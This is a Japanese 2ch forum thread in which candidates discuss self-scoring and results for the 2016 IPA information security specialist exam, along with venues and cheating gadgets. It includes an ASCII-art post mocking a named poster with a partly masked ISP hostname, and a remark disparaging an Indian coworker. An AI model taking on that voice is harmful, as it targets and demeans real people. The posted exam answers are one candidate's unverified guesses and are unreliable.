2016/10/20(木) 21:43:30.96 ID:V4H/4f2A
合格発表おせえ…
何かその間に勉強できる資格ない?
705 :
名無し検定1級さん
2016/10/20(木) 21:46:52.38 ID:CFcgww7K
>>704 午後1切り濃厚だけど
俺はDB勉強してる
706 :
名無し検定1級さん
2016/10/20(木) 21:47:35.08 ID:lb7ry5uY
>>702 俺も午後1は同じ基準で問1,3を計算したけど63だった。午後2は明らかに60点を超えたから途中で計算をやめたけど多分70前半
まあ、本当の採点基準は闇の中だよね。
707 :
名無し検定1級さん
2016/10/20(木) 21:50:48.91 ID:oNQYla3m
ダメならダメで早く教えてほしい
708 :
名無し検定1級さん
2016/10/20(木) 21:51:32.39 ID:CFcgww7K
結果発表 クリスマス前だからなw
709 :
名無し検定1級さん
2016/10/20(木) 22:00:32.64 ID:baSp+Auy
TAC基準で
午後1 70(1,3)
午後2 76 (2)
午後1調整なし、午後2逆ゲタあるかもね
710 :
名無し検定1級さん
2016/10/20(木) 22:09:37.67 ID:4ecX2Zcm
え〜またか
711 :
名無し検定1級さん
2016/10/20(木) 22:11:50.77 ID:lb7ry5uY
ここからは煽りも増えるんだろうなー
他の資格を受けた時も、煽りレスがバンバン飛んでたし
気にしない気にしない
712 :
名無し検定1級さん
2016/10/20(木) 22:15:00.59 ID:LeT4y6pI
逆下駄やめてーーーーーー
713 :
名無し検定1級さん
2016/10/20(木) 22:21:02.60 ID:2Zb0V9D+
今回受かってれば、DBはもう取ったから春受けるものがない。
落ちてたら三度目行きます。
714 :
名無し検定1級さん
2016/10/20(木) 22:25:56.44 ID:HdRk10Zg
ノーコンでもう一回受けさせろ。CのBOF問題止めろ。
715 :
名無し検定1級さん
2016/10/20(木) 22:39:11.05 ID:5bQftgIo
実力が足りないのはわかってるんだ
受かってからも勉強するから、今回通してお願い もう1回受けるのめんどいんや
716 :
名無し検定1級さん
2016/10/20(木) 22:41:41.01 ID:GKA9hvym
2ヶ月に1回試験しろよ糞IPA
717 :
名無し検定1級さん
2016/10/20(木) 22:41:46.35 ID:3Hx9Ci+i
718 :
(*´∀`)情弱士
2016/10/20(木) 22:48:19.80 ID:GggVrZbC
719 :
(*´∀`)情弱士
2016/10/20(木) 22:52:21.82 ID:GggVrZbC
>>718 社員がネットを閲覧し始めたら、マルウェアがC&Cサーバと通信すればいいじゃん。
むずかしい処理なんか要らん。
720 :
名無し検定1級さん
2016/10/20(木) 22:52:37.69 ID:Ja54B4MR
自分だとどうしても甘くなるので誰か採点おながいします。
午後1
問1
設問1:エ、ア
設問2
(1)c:x1.x2.x3x.x4、d:y1.y2.y3.y4
(2)送信元IPアドレスが監視端末のもののみSSHサービスにアクセスできるように設定する
設問3
(1)SSHサービスにアクセスできるポート番号を監視端末のものに限定
(2)同じSSHのホスト鍵でSSHサービスにアクセスする攻撃
(3)イメージファイル作成時:秘密鍵で暗号化した情報を含むディジタル署名をイメージファイルに付加する
イメージファイル更新時:ディジタル署名に含まれる公開鍵をもとにイメージファイルの完全性を検証する
(4)インターネットとLTEルータ間で中間者攻撃により複合鍵を入手する
問3
設問1:エ
設問2:
(1)ウ、カ
(2)PC管理サーバに名称とハッシュ値が登録されていないプログラム
設問3
(1)送信元IPアドレスがプロキシ1のものに変換さているため
(2)オ
設問4
(1)PCまたはサーバから利用者IDとパスワードを取得し、認証を成功させる
(2)URLフィルタリング:業務に必要かつ安全であることを確認したURLをホワイトリストに登録する
カテゴリ単位フィルタリング:業務に不要と思われるカテゴリを”検知”から”遮断”に戻す
721 :
名無し検定1級さん
2016/10/20(木) 22:54:28.17 ID:jtTchXkD
>>714 あれCじゃなくてC++だろ
まあCの知識だけで解けたが
完全に間違ったのは最後の1問だけだわ
722 :
名無し検定1級さん
2016/10/20(木) 22:55:26.92 ID:2Zb0V9D+
723 :
名無し検定1級さん
2016/10/20(木) 22:55:49.49 ID:urAlmPN+
午後T・問3のプログラム問題だけどさ、
IPAのウイルス用語辞典には、
マクロ→
MS WordやMS Excelなどで、処理を自動化するために記述されたプログラムのことです。
文書ファイルや表計算ファイルに、データとともに格納されますので、一般には、
そのファイルのなかにマクロがあっても気が付きません。MS WordやMS Excelの
セキュリティ機能を高めることによって、事前にマクロの存在を確認することができます。
このマクロ機能を利用したマクロウイルスが蔓延し、大きな問題になっています。
マクロウイルス→
マクロプログラムで書かれたウイルスで、MS WordやMS Excelの文書ファイル、表計算ファイル
に感染することができます。
このウイルスに感染されたファイルを開くだけで、そのパソコンがウイルスに感染します。
したがって、これらの文書ファイル、表計算ファイルのやり取りだけで、ウイルスが拡散していきます。
従来のウイルスに比べて、感染力が強い、感染スピードが速いといった特徴があります。
特に、最近はE-mailの添付ファイルにより広範囲に感染していく例が多くなっています。
文書ファイル、表計算ファイルを開く前には、ワクチンソフトで検査する、MS Word、MS Excelの
セキュリティ機能を高めてマクロ検出を行うなどの手段をとることが必要です。
って書いてあるけど、やっぱり「マクロはプログラムではない」ってことになる?
ここの成否が合否を分けそうなんで必死なんだよね。
724 :
名無し検定1級さん
2016/10/20(木) 22:57:59.23 ID:jnN2ANrk
|┌──────────┐ 履歴書
|| / \ | ┌─────────────────────
|| / ─ ─\ | |氏名:ワカヤマン(IT系資格試験挑戦厨)
||/ (●) (●) \ | ├─────────────────────
||| (__人__) |. | |年齢:40代前半(アラフォーw)
||\ ` ⌒´ ,/. | ├─────────────────────
||...イ.ヽヽ、___ ーーノ゙- 、 | |現住所:和歌山県 ntwkym0*****.wkym.nt.adsl.ppp.infoweb.ne.jp
|| | '; \_____ ノ.|ヽ i....| ├─────────────────────
|| | \/゙(__)\,| i | | |自己PR:IT系資格取得に命懸けてます
|└──────────┘ └─────────────────────
| ┌───┬─┬───────────────────────────
| | 年 |月| 学歴・職歴
| ├───┼─┼───────────────────────────
| | | | 学 歴
| ├───┼─┼───────────────────────────
| |平成xx.|xx|和歌山大学システム工学部 虐められたため中退
| ├───┼─┼───────────────────────────
| | | | 職 歴
| ├───┼─┼───────────────────────────
| |平成xx.|xx|自宅警備員(要はただの和歌山の引き篭もりw)
| ├───┼─┼───────────────────────────
| | | | 資 格
| ├───┼─┼───────────────────────────
| |平成27|12|ネットワークスペシャリスト試験 6年連続脳内合格w(合格証書無し)
| ├───┼─┼───────────────────────────
| |平成28| 6|システム監査技術者試験 4年連続脳内合格w(合格証書無し)
| ├───┼─┼───────────────────────────
725 :
(*´∀`)情弱士
2016/10/20(木) 23:05:13.65 ID:GggVrZbC
2種は5回目で合格=2年半。
1種は2回目で合格=1年半。
(*´∀`)これも運で合格したようなモノだなぁ。知能テスト的な読めば解答できる文章問題が多かったし。
(*´∀`)12月まで暇だぞ。
726 :
名無し検定1級さん
2016/10/20(木) 23:11:01.47 ID:s6bwF37f
基本情報 受けてない
応用情報 大学で一発合格
ネスペ 入社1年目で一発合格
セスペ 今回
727 :
名無し検定1級さん
2016/10/20(木) 23:20:13.59 ID:lb7ry5uY
>>720 辛く見て60後半、甘く見て70前半で多分70天元前後だと思う。
728 :
名無し検定1級さん
2016/10/20(木) 23:24:30.92 ID:DYIYUKBO
午後T:70ぐらい
午後U:ジャスト60(TAC配点)
このスレ見てると逆下駄ありそうだし、あと1点部分点引かれたら終わりだし、
落ちた可能性が極めて高い・・・
2ch優秀な奴多すぎだろ
729 :
名無し検定1級さん
2016/10/20(木) 23:28:57.13 ID:lb7ry5uY
>>728 この一年間に基本、応用、セスペと受けたけど、スレの雰囲気はどこもこんな感じだよ。
特に、春の応用はいくつかの問題を巡って煽り合いが起きたし。
他の資格のスレだと、予備校のメルマガを騙った偽講評まで出回ってるから、気にしないほうがいい。
730 :
名無し検定1級さん
2016/10/20(木) 23:31:24.91 ID:CFcgww7K
>>729 昨年秋の応用はあんなもんじゃなかったよw
731 :
名無し検定1級さん
2016/10/20(木) 23:32:50.71 ID:9BCPeQOb
>>726 すげえ
IT界だとこういう人がうじゃうじゃいるのだろうか
応用ですら一発で取れず今回も二回目なのに午後怪しいのに来年からSIerやっていけるか不安だ
732 :
名無し検定1級さん
2016/10/20(木) 23:32:55.47 ID:lb7ry5uY
733 :
名無し検定1級さん
2016/10/20(木) 23:36:19.25 ID:fngTinP8
応用 PM NW 1回目
DB 2回目(問選択未記入で1アウト)
次受ける資格はTOEIC700↑
単価の安い海外の開発会社と連動する係になりたい
734 :
名無し検定1級さん
2016/10/20(木) 23:36:53.63 ID:CFcgww7K
>>732 簡単すぎた監査 VS 地雷のDBって感じだった
2chだけでなくドットコムまですごい荒れてて
管理人が結構削除してた気がした
735 :
名無し検定1級さん
2016/10/20(木) 23:41:10.09 ID:2GtuiGge
736 :
名無し検定1級さん
2016/10/20(木) 23:42:08.62 ID:jtTchXkD
>>731 IT業界で言ったらそれこそ高校生でセキュスペ取るようなやつも大勢いるからな
自分より若くて能力があり、そんなやつが可視化されやすいのがIT業界だと思う
737 :
名無し検定1級さん
2016/10/20(木) 23:42:44.80 ID:psdsnAE0
応用が一番荒れるんだよ
基本取って就活のために応用取ろうとした意識高い系とか
就職して数年の意識高いアクティブ新卒が受けるからね
若いんだよ受験層が
高度はおっさんばっかりだからまるで神仏のように悟りを開いたり受け入れる
738 :
名無し検定1級さん
2016/10/20(木) 23:44:43.09 ID:fngTinP8
スレみた感じの私見だが
『今までは難易度的にSCをスルーしてたけど、RISSの試験免除が目的の、素の状態でSCに受かる中年エンジニアが駆け込んだ』
て状態な気がする。
今回は合格率高いんじゃなかろうか。
739 :
名無し検定1級さん
2016/10/20(木) 23:45:01.55 ID:Cd/NUrgl
>>720 TAC採点で52点になってしまった
甘めでもジャスト60点ってところじゃないかな
740 :
名無し検定1級さん
2016/10/20(木) 23:46:50.25 ID:lb7ry5uY
それはあるかも(笑)
あと、応用の受験者には身なりが残念な試験ベテの割合が高いのも大きい気がする。
741 :
名無し検定1級さん
2016/10/20(木) 23:46:57.77 ID:ufivNHIM
あ〜落ちたわ
ウ~ン…バタッw
742 :
名無し検定1級さん
2016/10/20(木) 23:47:43.45 ID:Tl0fFwPW
743 :
名無し検定1級さん
2016/10/20(木) 23:49:12.77 ID:hh293bIZ
>>733 問題未選択の場合、0点になりましたか?
(Webの得点問い合わせ)
744 :
名無し検定1級さん
2016/10/20(木) 23:50:05.71 ID:Tl0fFwPW
応用は前のおっさんが昼の時間に必死に参考書めくってて笑ったわ
ちなみに落ちてた
745 :
名無し検定1級さん
2016/10/20(木) 23:51:37.55 ID:fngTinP8
>>743 確か点数が出なかった気がするんだが、よく覚えてない
答案提出時に気付いちゃったんで、午後2受けずに帰った
746 :
名無し検定1級さん
2016/10/20(木) 23:51:48.33 ID:8yJ4yWgQ
,, -─-∧ ∧-─-、
/ ─ \ ハァ? / ─ \
/ (●) ヽ / (●) ゙i
| , -''(、_,.) | > < | (、_,.)''ー 、 =@ |
ヽ ( (´\ ( (●)/ | (●) ) /`) ) /
/\ヽ`ニ´ ノ / \ ヽ `ニノ /\
/ `ー- 、一'' `''ーr -一'´ ゙i
| | 、 | | 、 | |
ワカヤマン「これからはより細かい所まで覚える事で確実に合格してみせる。」
979 :名無し検定1級さん:2012/09/13(木) 23:34:15.12
なぜ、どこぞの野球スレに行かないのか不思議な問題児。
野球の話する奴の試験情報なんていらねぇーよ、○ねごみくず
っとか言われたいのだろう。なんか不憫・・・
出題範囲ある程度基本は覚えた。
これからはより細かい所まで覚える事で確実に合格してみせる。
シラバス的にはライブマイグレーションとか出題されそうじゃね?
http://ikura.2ch.net/test/read.cgi/lic/1344659507/979 747 :
名無し検定1級さん
2016/10/20(木) 23:54:13.46 ID:2GtuiGge
おっさんの勝手ながら採点したら39と45だったが
「自己採点よりxx点低かった。逆下駄がひどい」とかいうケースはこういうことなんだな
748 :
名無し検定1級さん
2016/10/20(木) 23:54:19.07 ID:psdsnAE0
>>744 何で他人が落ちたかどうかわかるんですかねぇ
749 :
名無し検定1級さん
2016/10/20(木) 23:54:51.21 ID:lb7ry5uY
>>744 応用の時は前後の5人ずつくらいが落ちててビビった記憶がある。
こちとら、社内情シスに移って一年目のペーペーなのに。
750 :
名無し検定1級さん
2016/10/20(木) 23:57:00.89 ID:fngTinP8
>>748 合格者番号一覧から見ると、自分の番号前後の合格状況が目に入るから、自然とそういうことを想像する
NWの時は田舎の割りと狭い教室だったが、自分以外全滅だったんでよく覚えてる
751 :
名無し検定1級さん
2016/10/20(木) 23:57:18.33 ID:Tl0fFwPW
>>748 いや合格発表で番号入れれば見れるだろ
成績じゃなくて合格してるかしてないか
752 :
名無し検定1級さん
2016/10/21(金) 00:00:27.24 ID:z0LyKs9Z
昼間に参考書で勉強してて笑うのは酷い
別にいいでしょ
753 :
名無し検定1級さん
2016/10/21(金) 00:02:01.51 ID:TsyWt5v5
itecの予想配点まだかな
tacでは辛めで午後1が65、午後2が73だった
びみょー
754 :
名無し検定1級さん
2016/10/21(金) 00:05:11.19 ID:R4JoJuWi
おっさんになると学習能力落ちてるって以前に普段資格の勉強する時間が取れないからな
当日試験受けに来ない層も申し込んだは良いけど勉強できなかったってのが多いのではないかと思ってしまう
755 :
702
2016/10/21(金) 00:08:09.13 ID:g4SeHIwk
午後1の点数60点超えてる人多いんだね(´・ω・`)
756 :
名無し検定1級さん
2016/10/21(金) 00:08:12.73 ID:6LBAsMa6
>>752 様子が尋常じゃなかったからね
おにぎり片手にすごい速度でページ捲ってたら笑っちゃうよ
757 :
名無し検定1級さん
2016/10/21(金) 00:10:35.58 ID:LOByTa93
758 :
名無し検定1級さん
2016/10/21(金) 00:11:53.14 ID:vWODt6vV
番号増やせば後ろのやつの合否分かるな
真後ろが鼻すする音ウッゼー糞ゴミだったから落ちてるか確認しよ
759 :
名無し検定1級さん
2016/10/21(金) 00:12:03.70 ID:VVRFsGKz
やや厳しめで採点してみた
午前1:70
午前2:84
午後1:75
午後2:74
昔応用取ったから午前1の対策をほとんどしてなかったんだけど、
新しい問題が多かったり忘れてたりで、
まさかの午前1落ちなんじゃないかと心配だったわ
760 :
名無し検定1級さん
2016/10/21(金) 00:15:07.25 ID:7X+QjT+v
午後2高得点の人大杉だろ…
問2を選んだが糞みたいな点数だったんだが…
761 :
名無し検定1級さん
2016/10/21(金) 00:17:16.17 ID:LOByTa93
午後1の問1と午後2は調整の対象かもね
まあ、このスレの住人は技術者が多いから
異論を言う人が出てきそうだけど
762 :
名無し検定1級さん
2016/10/21(金) 00:17:16.34 ID:kw/fjtzV
>>758 個別表示画面はパスワード保護されてるから、成功したら不正アクセス禁止法違反
763 :
名無し検定1級さん
2016/10/21(金) 00:18:00.11 ID:2+6io8Tk
自己採点微妙なくせに発表まで長すぎて「くっ…早くコロせっ…」って感じの気分だわ
764 :
名無し検定1級さん
2016/10/21(金) 00:18:14.94 ID:OfBD3tbl
おまえら合格発表でブルートフォースすんなよw
765 :
名無し検定1級さん
2016/10/21(金) 00:19:29.42 ID:dKoiyqwR
合格発表時は通常の千倍ぐらいのアクセスになるからな
クラウド型にしたほうがいいんじゃない?
766 :
名無し検定1級さん
2016/10/21(金) 00:19:55.48 ID:VVRFsGKz
>>758 うちの会場では正念場の午後2のときにオバハンが机に何かを打ち付ける音を出し続けてて本当迷惑だった
絶対わざとだろあれ
耳栓持ってきたのに今回から使えませんとか言われたし
767 :
720
2016/10/21(金) 00:20:06.79 ID:U1vyMN9t
>>722,727,735,739
採点あんがと!
知識不足、国語力不足でお恥ずかしい(^^;
いけてたらいいな〜くらいで、期待せずに(まぁ、少しはしてしまうんだが)2ヶ月後の発表を待ってみるよ!
768 :
名無し検定1級さん
2016/10/21(金) 00:21:40.31 ID:Y0A+PAoM
もう公式の解答発表までイベント無いからしばらく過疎るだろうな
769 :
名無し検定1級さん
2016/10/21(金) 00:21:41.42 ID:VVRFsGKz
>>764 IPAのシステムに侵入して不合格を合格に改竄した奴はそのまま合格でいいんじゃね?
770 :
名無し検定1級さん
2016/10/21(金) 00:25:25.01 ID:z0LyKs9Z
パスワードは1億通り
手打ちアタックじゃ無理だなあ
771 :
名無し検定1級さん
2016/10/21(金) 00:26:27.08 ID:OfBD3tbl
>>769 不正アクセス禁止法違反だから
合格→即剥奪やなw
772 :
名無し検定1級さん
2016/10/21(金) 00:27:05.42 ID:kw/fjtzV
>>766 耳栓偽装のbluetoothイヤホンがあるから仕方ないよね
本気でカンニングするなら置き時計に偽装した文字盤投影キーボードとメガネの裏側に検索結果を表示するARだな
試験開始前5分はこういう下らん思考が頭を占めてる
773 :
名無し検定1級さん
2016/10/21(金) 00:27:11.30 ID:LOByTa93
結局、ITECの配点予想は出てこないってことでFA試験講評も作っていないみたいだし。
774 :
名無し検定1級さん
2016/10/21(金) 01:45:47.20 ID:iLfe9+KY
ITECの配点出てこなかったのか…。
午後2逆下駄だったら死亡するしかないんだよなあ…。
775 :
名無し検定1級さん
2016/10/21(金) 02:57:22.79 ID:BQz7p6et
大阪の方、試験会場どこでしたか?
776 :
名無し検定1級さん
2016/10/21(金) 04:04:08.40 ID:6TPjzB1M
>>772 今はアナログ時計に見えるスマートウォッチも多くなってきたし、個人の時計も禁止されていくかもね。大きい時計を会場に置くなりして。
777 :
名無し検定1級さん
2016/10/21(金) 06:12:27.39 ID:6LBAsMa6
>>765 EDos攻撃しちゃうやつが出てくるだろ
778 :
名無し検定1級さん
2016/10/21(金) 06:22:40.32 ID:w4d7BA4k
そういえば今回から耳栓禁止って言ってたな
初めて聞いたよ
何か問題があったのかな
779 :
名無し検定1級さん
2016/10/21(金) 06:24:17.37 ID:xwUIYU1+
780 :
名無し検定1級さん
2016/10/21(金) 06:27:15.63 ID:w4d7BA4k
781 :
名無し検定1級さん
2016/10/21(金) 06:29:14.47 ID:h65w2fZ7
ググるのも一つの解決法だからなあ
782 :
名無し検定1級さん
2016/10/21(金) 06:29:19.33 ID:MUp1SNvG
とりあえずはルーペが使用できるから、眼鏡はなくても最悪なんとかなるな。
783 :
名無し検定1級さん
2016/10/21(金) 06:30:43.79 ID:+14aSEuL
google検索あり、知恵袋ありの試験にすれば良い。それが現実的
784 :
名無し検定1級さん
2016/10/21(金) 06:43:27.72 ID:6LBAsMa6
>>778 耳栓型Bluetoothイヤホンが安くなった
785 :
(*´∀`)情弱士
2016/10/21(金) 06:55:22.45 ID:3oKjZO/0
>>733 日本人に仕事くれよ。 某開発チームはインド人が居て、わきが臭いヤツが一人居た。
786 :
(*´∀`)情弱士
2016/10/21(金) 06:58:09.45 ID:3oKjZO/0
>>769 今回の出題内容をそのまま実行したヤツは居るかもな。
787 :
名無し検定1級さん
2016/10/21(金) 06:58:47.23 ID:z/GQcfL2
788 :
(*´∀`)情弱士
2016/10/21(金) 06:59:29.81 ID:3oKjZO/0
>>775 阪急京都線 正雀駅の大阪大学院大学。
春はJR天満 近くの7階建てのビル。
789 :
(*´∀`)情弱士
2016/10/21(金) 07:06:40.87 ID:3oKjZO/0
>>788 大阪学院大学に訂正。 出席率が低く空席が目立つ。
机や椅子は綺麗だけど、男便所に行列ができて3分くらい待つ。
790 :
775
2016/10/21(金) 07:13:09.97 ID:Drq1qz7T
皆さんレスありがとうございました。
ギリギリ申込だと遠い会場になるらしいですね。
791 :
名無し検定1級さん
2016/10/21(金) 07:15:31.40 ID:8b/of3oW
ギリギリ申し込みで最後の番号狙ってるけど毎回希望したとこだわ田舎だもん
先日のセスペは終了5分前に申し込んだのに俺の後ろにいる猛者がいた
792 :
(*´∀`)情弱士
2016/10/21(金) 07:15:33.86 ID:3oKjZO/0
>>772 2017年から、午前問題は過去問道場のようになる。 入社試験のようにな。
マークシートが懐かしいのぅ・・っていう時代は来るよ。
793 :
名無し検定1級さん
2016/10/21(金) 07:18:24.37 ID:jbknP1mS
公式解答公表まで、あと7週
合格発表まで、あと8週
794 :
名無し検定1級さん
2016/10/21(金) 07:20:45.40 ID:LOByTa93
うちは多分家から近い大学だわ
東京だけど
795 :
(*´∀`)情弱士
2016/10/21(金) 07:35:30.94 ID:3oKjZO/0
>>776 大阪学院大学には時計が無い。スマートウォッチは今でも禁止だけど、
判断つかないような時計は取り扱い説明書持参でいいのでは?
俺は目覚まし電波時計を机に置いていた。
796 :
名無し検定1級さん
2016/10/21(金) 07:36:02.65 ID:8Nk7k+/l
東京の人たちは会場どこだった?
俺は早稲田大学だった
797 :
名無し検定1級さん
2016/10/21(金) 07:40:55.99 ID:8b/of3oW
目覚まし電波時計を改造してカンニングペーパーにすることぐらい造作もない
後ろからモロ見えだから使えないけど
798 :
(*´∀`)情弱士
2016/10/21(金) 07:54:48.07 ID:3oKjZO/0
いかにもカンニングペーパーが巻いてあるんだろ?って思わせるような時計はダメだろう
Devon Tread 1 Watch
ダウンロード&関連動画>> 799 :
名無し検定1級さん
2016/10/21(金) 08:01:57.27 ID:jbknP1mS
みな、下駄下駄って言ってるけど、午後のどの問題の上位4〜5割に入らないと合格はないからな。
特に今回は、春SG合格で勘違い受験者や、支援士効果の俄受験者が多いだろうから、上位4割に入ってないと厳しいかも!!?
800 :
(*´∀`)情弱士
2016/10/21(金) 08:04:29.81 ID:3oKjZO/0
>>799 出席率が低いと採点が甘くなるのか? だったら嬉しいのぅ・・。
免除組は、そんなに座っていなかったから。
801 :
名無し検定1級さん
2016/10/21(金) 08:11:26.43 ID:8b/of3oW
欠席は関係ないぞ
受験した人から各試験でだいたい50%ずつぐらい落としてく
802 :
名無し検定1級さん
2016/10/21(金) 08:16:10.24 ID:20USCXPB
TAC様で採点してみた。
午後T:53点(問1、3選択)
午後U:72点(問1選択)
午後T、特に問1が点数とれなさすぎて厳しいわ…
まぁまた来年でもいいんだが、早く合否知りたい。。。
みんな、午後1の自己採点普通に6割越えてるみたいですごいわ。
803 :
名無し検定1級さん
2016/10/21(金) 08:17:57.51 ID:20USCXPB
むしろ、出席率が高くて自分も含めてなんちゃって受験者が多い方が、平均点下げるから採点甘くなると思われる。
804 :
名無し検定1級さん
2016/10/21(金) 08:29:43.74 ID:vtgEc32b
今回の試験に限れば、SGからの移行組にとって不利な問題が多かったから、受験者の増加で採点が厳しくなるってのは考えにくい。
ただ、午後2が古典的な問題だらけってのは気になる。
採点が厳しくなるのはこっちじゃね?
805 :
名無し検定1級さん
2016/10/21(金) 08:39:42.26 ID:bjeWOFJY
午後2、古典的か?
まあ、難易度は高くないだろうから
逆ゲタは考えられる
それ以前に午後1が問題だが
自分の場合
806 :
名無し検定1級さん
2016/10/21(金) 08:50:09.88 ID:bjeWOFJY
まあ、受かってようが落ちてようが
dbの午前から勉強するわ
807 :
名無し検定1級さん
2016/10/21(金) 08:56:33.52 ID:rkgnqLfT
>>803 そんな奴らは午前で落ちるから意味ないよ
808 :
名無し検定1級さん
2016/10/21(金) 09:02:30.96 ID:Kn9GSHau
>>806 俺もDBの午前午後並行して勉強するわ。
今回の試験で痛い目を見たから、午後は舐めてかかれやい。
809 :
(*´∀`)情弱士
2016/10/21(金) 09:32:19.08 ID:3oKjZO/0
810 :
(*´∀`)情弱士
2016/10/21(金) 09:33:42.71 ID:3oKjZO/0
>>809 サイバーセキュリティ経営ガイドラインの2ページに、
指示8:攻撃側のレベルは常に向上することから、情報共有活動に参加し、最新の状
況を自社の対策に反映すること。また、可能な限り、自社への攻撃情報を公
的な情報共有活動に提供するなどにより、同様の被害が社会全体に広がるこ
との未然防止に貢献すること。
と、書いてる。これが答え
811 :
名無し検定1級さん
2016/10/21(金) 09:36:02.03 ID:qpkfNDBj
114.9%ってすごいよなー
受験者増加は合格ラインを引下げる方向に働くよね、たぶん
812 :
(*´∀`)情弱士
2016/10/21(金) 10:27:51.07 ID:3oKjZO/0
>>810 CVSSが出てきてるし、脆弱性発見者の氏名の公開(本人許可が必要)の事を思い出せ。
ということを問うているように思える。
813 :
名無し検定1級さん
2016/10/21(金) 10:31:15.09 ID:9Q+nyFF1
>>811 合格率を基準にしてるだろうからラインは合格率次第では
814 :
名無し検定1級さん
2016/10/21(金) 10:42:28.59 ID:bjeWOFJY
上にも書いてた人いたけど、支援士免除目的でベテランが受けてる人が多いってのは充分考えられるからその分ボーダーが削られるかも
815 :
名無し検定1級さん
2016/10/21(金) 10:45:49.29 ID:Kn9GSHau
>>814 過去の試験を見るとわかるけど、合格率は若い人の方が高いんだよね。どの試験でも。
まあ、今回は他資格持ちのベテランが大挙してくる可能性も否定できないから、どちらにしろ様子見だわ。
816 :
名無し検定1級さん
2016/10/21(金) 11:05:50.20 ID:u3RTC/y4
支援師とかそんなに流行ってないだろ
増加分は、最後だし受けとくかっていうライトな層が主で、あとは春にSG受かったし次はセスペっていう層かと予想
支援師に関心ある人はさすがに合格済みかと
817 :
名無し検定1級さん
2016/10/21(金) 12:23:33.41 ID:6KfBHH7+
Cプラプラ知らんけど当てずっぽうで全部合ってた
818 :
名無し検定1級さん
2016/10/21(金) 12:24:06.02 ID:VBECWjJR
>>802 ほぼ同じやわ
前回午後2が3点足らずに落ちたけど、参考までに自己採点と実点数の違いを書くと、午後1が10点以上の上方修正(下駄等)、午後2が10点以上の下方修正だった
何度も言われてるけど、午後2の方が被採点者のレベルが上がるので、採点が厳しめになるのだと思う
今回、午後1が53(1.3選択)、午後2が76。午後1突破できたら何とかなるような気がするんだが
819 :
名無し検定1級さん
2016/10/21(金) 12:24:09.65 ID:sIZ7IYvU
SGからの移行(?)組が受かるような試験じゃないからなぁ
ボーダー下がるといいんだが
820 :
名無し検定1級さん
2016/10/21(金) 12:26:14.71 ID:qv0jnhz0
わかってないやつがいるな。
午後2は、難関の午後1をパスした受験者の中でさらに上位4〜5割の得点の必要があるんだよ。
採点が甘いとか厳しいとかの問題じゃないだろと思うよ。
821 :
名無し検定1級さん
2016/10/21(金) 12:28:37.73 ID:VBECWjJR
いやいや、自己採点との差分を見ているから採点厳しめなのは間違いないと思う
822 :
名無し検定1級さん
2016/10/21(金) 12:34:05.69 ID:VBECWjJR
ちなみに、60点以上が合格という建前はわかってるよね? 宅建とか合格点が毎回変わる試験とは違うんやで?
823 :
名無し検定1級さん
2016/10/21(金) 12:36:46.49 ID:R7F8iX0F
>>796 亀で申し訳ないけど、駿台学園(王子と王子神谷の間くらい)だった。
多分家から一番行きやすいとこ。
以前受けたときも王子が最寄りのとこ(中央工学校)だった。
だいぶ前に応用受けたときの話だけど、
ギリギリで申し込みしたら変なところに飛ばされたから、
とりあえず申し込むのだけはさっさとやることにしてる。
>>820 やっぱそういうことだよね。
前に受けたとき午後1の手応えが微妙で、午後2は大丈夫、
という感じだったのに、結果は真逆だったしなあ。
まあ、自分の思わぬところで減点されてる可能性はあるけど。
ITECの配点例まだでないね…。
824 :
名無し検定1級さん
2016/10/21(金) 12:38:25.74 ID:Kn9GSHau
午後1と午後2は部分点の考え方が違う予感。
午後2の場合は必須項目を多めに用意して、足りなかったり余計なものを書いたりしたら減点とか。
825 :
名無し検定1級さん
2016/10/21(金) 12:40:07.36 ID:ucn6G42S
>>823 王子かー
多摩地区はなかったのかな〜?
826 :
名無し検定1級さん
2016/10/21(金) 12:41:59.56 ID:Kn9GSHau
多摩地区ではないけど、玉川大学は会場だったよ。
しかも全区分。
827 :
名無し検定1級さん
2016/10/21(金) 12:44:12.36 ID:R7F8iX0F
>>825 俺は実際に住んでるのは川口市だから、ドアtoドアで30分くらいで着くようなとこだよ。
埼玉に住んでるからと言って埼玉を選んで所沢に飛ばされた苦い経験があって、
それ以来東京を選ぶようにした。
多摩地区は大学いっぱいあるし結構いそうだけどどうなんだろう。
828 :
名無し検定1級さん
2016/10/21(金) 12:44:23.06 ID:VBECWjJR
>>824 その考え方に私も一票
あるいは、想定合格率に達するように一律全得点を底上げとかw
829 :
名無し検定1級さん
2016/10/21(金) 12:46:47.57 ID:6KfBHH7+
セスペって問題設定も運営も場当たり的だよね
少しは最初から頭使えよ
830 :
名無し検定1級さん
2016/10/21(金) 12:48:08.11 ID:yMHab6r6
ITec配点でたぞ
831 :
名無し検定1級さん
2016/10/21(金) 12:51:06.10 ID:Kn9GSHau
>>827 大学は多いけど、当日は宅建もあるから配慮はしてると思う。
今までの受験会場は上智(宅建)東京経済(基本&応用)と玉学(セスペ)で、東京経済は基本と応用しか使わない会場だったよ。
832 :
名無し検定1級さん
2016/10/21(金) 12:54:06.88 ID:Kn9GSHau
ITEC配点で55から70
TAC配点もほぼ同じ
午後1はこんな感じかな?
833 :
名無し検定1級さん
2016/10/21(金) 12:56:47.30 ID:7FZc4DxI
お前ら言っておくが配点予想なんて意味無いからな…
上位に入ってなきゃどれだけ高得点でも落ちるんだよ…
上でも書かれてるが午後2は下方修正かなりキツいからな…
834 :
名無し検定1級さん
2016/10/21(金) 12:57:31.46 ID:Kn9GSHau
午後2は激辛で65
部分点ありで72
微妙かな?
835 :
名無し検定1級さん
2016/10/21(金) 12:59:14.54 ID:bjeWOFJY
>>833 確かに午後2の今回はマイナス10くらい平気でしそう
836 :
名無し検定1級さん
2016/10/21(金) 13:05:07.57 ID:R7F8iX0F
>>831 あー、そうか。そういえば宅建も同じ日だった。
確かにそうすると棲み分けが必要だね。
837 :
名無し検定1級さん
2016/10/21(金) 13:22:24.03 ID:z0LyKs9Z
午後1は楽勝だったけど午後2TAC配点でボーダーの俺は実は全然ボーダーじゃないってことか
838 :
名無し検定1級さん
2016/10/21(金) 13:26:53.60 ID:R7F8iX0F
ITEC解答+配点だと午後2は大丈夫そう。
TACだと微妙なライン…。
まあ、それ以前に午後1が怪しいんですけどね。
839 :
名無し検定1級さん
2016/10/21(金) 13:32:40.67 ID:bjeWOFJY
>>819 そもそもsgからscに移る人がそんなに多いとは思えないんだが普通、応用とか基本に移ると思ってた
いることにはいるだろうけど
840 :
名無し検定1級さん
2016/10/21(金) 13:33:51.05 ID:vtgEc32b
むしろ、SGから応用に移って、あの広範な試験を突破できるとは思えんのだが。
841 :
名無し検定1級さん
2016/10/21(金) 13:43:18.34 ID:7OgYRjEp
